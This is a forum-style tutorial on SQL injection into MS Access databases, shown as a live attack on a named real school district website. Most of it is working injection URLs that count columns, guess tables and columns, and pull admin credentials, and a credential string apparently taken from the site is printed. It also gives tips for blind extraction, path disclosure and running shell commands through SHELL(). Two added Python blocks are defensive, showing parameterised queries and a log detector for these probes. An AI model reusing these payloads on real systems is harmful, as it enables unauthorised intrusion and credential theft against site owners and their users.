
Sql Injection Ms Access [Mssql] Basic

Posted by CB Blogger

This tut will show you how to inject into an Access DB.
First, thanks to ☆¸.•*☆ƶεяø ĉööl☆*•.¸☆ for the site.
OK, let's start.
We are going to inject on this site:
http://www.sdhc.k12.fl.us/Schools/School...?Site=0151

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151
How do we know it's vulnerable? Like a regular injection: type a ' at the end of the value.

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151'
error 80040e14
[Image: s33tD.png]
First, I noticed that there are some people who don't know why this error happens, so here is the explanation.
The coder expected that we use numbers only,
for example
for example
id=10
id=7
id=234984
or letters
cat_id=index
cat_id=cars
or both
id=car1
A-Z 0-9
but he didn't expect that we would use a ' character,
because there is no such thing as
id=46'78
id=t'6'8'jh
so this error happens. Instead of ' we can also type @, for example
id=1@
or ^,
same principle.
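As an added example, not code from the original post: the lookup behind a page like School_Info.asp written the vulnerable way (value pasted into the SQL text) next to the hardened way (numeric allow-list plus a bound parameter). sqlite3 stands in for the Access/Jet database, and the table and row contents are constructed.

```python
import re
import sqlite3

# Added example (not from the original post). sqlite3 stands in for the
# Access/Jet database; table and row contents are constructed.
SITE_ID_RE = re.compile(r"^[0-9]{1,8}$")  # the page expects a numeric site code like 0151


def build_unsafe_query(site):
    """Vulnerable pattern: the value is pasted into the SQL text, so a stray
    quote changes the statement (the post's 80040e14 syntax error)."""
    return "SELECT name, phone FROM schools WHERE site = '" + site + "'"


def run_unsafe(conn, site):
    """Runs the string-built query; returns rows, or 'error' when the input
    broke the statement (the sqlite analogue of the 80040e14 page error)."""
    try:
        return conn.execute(build_unsafe_query(site)).fetchall()
    except sqlite3.Error:
        return "error"


def lookup_school_safe(conn, site):
    """Hardened version: allow-list the id, then bind it as a parameter.
    Returns the matching row or None; raises ValueError on bad input."""
    if not SITE_ID_RE.match(site):
        raise ValueError("site id must be 1-8 digits")
    cur = conn.execute("SELECT name, phone FROM schools WHERE site = ?", (site,))
    return cur.fetchone()


def is_accepted(conn, site):
    """True when the hardened lookup accepts the input at all."""
    try:
        lookup_school_safe(conn, site)
        return True
    except ValueError:
        return False


def demo_db():
    """In-memory stand-in with one constructed school row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schools (site TEXT, name TEXT, phone TEXT)")
    conn.execute("INSERT INTO schools VALUES ('0151', 'Example School', '555-0100')")
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(run_unsafe(db, "0151"))          # [('Example School', '555-0100')]
    print(run_unsafe(db, "0151'"))         # error: the quote breaks the statement
    print(is_accepted(db, "0151 order by 67"))  # False: rejected before any SQL runs
```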
After we have understood that, let's move on.
In Access we can count the columns with ORDER BY / GROUP BY.
(If you don't know why we are counting the columns, read my tut http://hackforums.net/showthread.php?tid=2125898 )

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+68
error 80004005: there are not 68 columns in the table.
[Image: TNCIC.png]
Let's try 67.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+67
The page loads normally, so there are 67 columns.
[Image: E7I7G.png]
In Access, -- doesn't exist, so we are using a null byte (%00).
So:

Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67%00
error:
"Query input must contain at least one table or query."
[Image: Nn2d5.png]
It's OK!
It means our column count is correct, but an Access DB is like MySQL 4: we have to guess tables and columns.
Like this:

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from login%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from users%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
The page loads normally: the admin table exists.
[Image: tgyHO.png]
As you can see, column 4 is the one that shows up on the page, so let's inject there.
We have to guess the column names.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
No error, the column exists.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
No error, the column exists.

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
No error, the column exists.
Columns: admin_id, admin_login, admin_password.
In Access we can't use concat(), so we are using %26 (the URL-encoded & operator) instead.
So:

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id+%26+0x3a+%26+admin_password+%26+0x3a+%26+admin_login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67+from+admin%00
[Image: wuANq.png]
1:Powell:Karin

Some comments:
- LIMIT doesn't exist, so we use TOP X instead:
UNION SELECT TOP 1 PASS FROM USER
- To find the full path, we query a false DB, like this:

Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1+FROM+X.X
c:\windows\system32\inetsrv\X.mdb
- We can run subqueries like this:
AND (SELECT TOP 1 data FROM table)%00
- For blind injection, instead of SUBSTRING we use MID():
UNION SELECT MID(benzi,1,1) FROM table%00
returns b
UNION SELECT MID(benzi,2,1) FROM table%00
returns e.
- We can run shell commands like this:
AND SHELL('cmd.exe /c command ')%00
If you want to get root with SHELL():
http://withoutmoneyschool.blogspot.co.id/2016/05/sql-injection-owning-windows-server.html
But it's rare that SHELL() will be available, because the admin can block this function.
- The function CURDIR() returns the location.
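As an added defensive example, not part of the original post: a small detector that runs over constructed IIS W3C log lines and flags the request patterns this tutorial walks through (the trailing quote, ORDER BY column probing, UNION SELECT with a %00 terminator, SHELL() and MID() calls). The field layout assumes the default IIS W3C columns, and all log lines and IP addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Added example (not from the original post). Constructed IIS W3C log lines in the
# default field order: date time s-ip method uri-stem uri-query port user c-ip ua status.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2016-05-01 10:00:01 10.0.0.5 GET /Schools/School_Info.asp Site=0151 80 - 203.0.113.7 Mozilla/5.0 200
2016-05-01 10:00:09 10.0.0.5 GET /Schools/School_Info.asp Site=0151' 80 - 203.0.113.7 Mozilla/5.0 500
2016-05-01 10:00:20 10.0.0.5 GET /Schools/School_Info.asp Site=0151+order+by+68 80 - 203.0.113.7 Mozilla/5.0 500
2016-05-01 10:00:31 10.0.0.5 GET /Schools/School_Info.asp Site=0151+order+by+67 80 - 203.0.113.7 Mozilla/5.0 200
2016-05-01 10:00:45 10.0.0.5 GET /Schools/School_Info.asp Site=0151+UNION+SELECT+1,2,3,4%00 80 - 203.0.113.7 Mozilla/5.0 500
2016-05-01 10:01:02 10.0.0.5 GET /Schools/School_Info.asp Site=0152 80 - 198.51.100.9 Mozilla/5.0 200
"""

# One pattern per probe the tutorial describes; matched against the decoded, lowercased query.
INDICATORS = {
    "quote_probe": re.compile(r"\d'\s*$"),               # Site=0151'
    "order_by_enum": re.compile(r"\border\s+by\s+\d+"),  # column counting
    "union_select": re.compile(r"\bunion\s+select\b"),
    "null_byte": re.compile("\x00"),                     # %00 used instead of --
    "shell_call": re.compile(r"\bshell\s*\("),
    "mid_call": re.compile(r"\bmid\s*\("),
}


def parse_iis_line(line):
    """Returns {client, query, status} or None for comment/short lines."""
    f = line.split()
    if line.startswith("#") or len(f) < 11:
        return None
    return {"client": f[8], "query": unquote_plus(f[5]), "status": f[10]}


def classify(query):
    q = query.lower()
    return [name for name, rx in INDICATORS.items() if rx.search(q)]


def scan(lines):
    """Per client IP: number of flagged requests, indicator names seen, 5xx count."""
    report = defaultdict(lambda: {"hits": 0, "tags": set(), "errors": 0})
    for line in lines:
        rec = parse_iis_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if not tags:
            continue
        entry = report[rec["client"]]
        entry["hits"] += 1
        entry["tags"].update(tags)
        if rec["status"].startswith("5"):
            entry["errors"] += 1
    return dict(report)
```

A burst of flagged requests from one client with several 5xx responses is the column-counting phase described above; alerting on that combination catches the probing before the UNION stage succeeds.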
